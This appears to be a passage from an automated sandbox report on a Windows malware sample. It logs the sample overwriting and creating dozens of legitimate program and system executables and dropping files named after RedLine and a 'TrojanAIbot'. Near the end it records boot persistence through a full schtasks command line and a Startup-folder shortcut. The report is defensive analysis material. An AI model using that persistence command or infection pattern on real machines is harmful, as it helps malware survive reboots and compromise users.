                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\TieringEngineService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\updater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\AgentService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\7-Zip\Uninstall.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\FXSSVC.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                        Source: C:\Windows\SysWOW64\svchost.exe  System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\SensorDataService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\msdtc.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Mozilla Firefox\pingsender.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Windows\System32\vds.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                        Source: C:\Windows\SysWOW64\svchost.exe  File created: C:\Users\user\AppData\Local\Temp\microsofts.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Windows\System32\snmptrap.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Windows\System32\Spectrum.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Windows\System32\Locator.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file

                        Boot Survival

                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 2_2_04DFCBD0

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\TieringEngineService.exe File created: C:\System Volume Information\Heat\
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004772DE
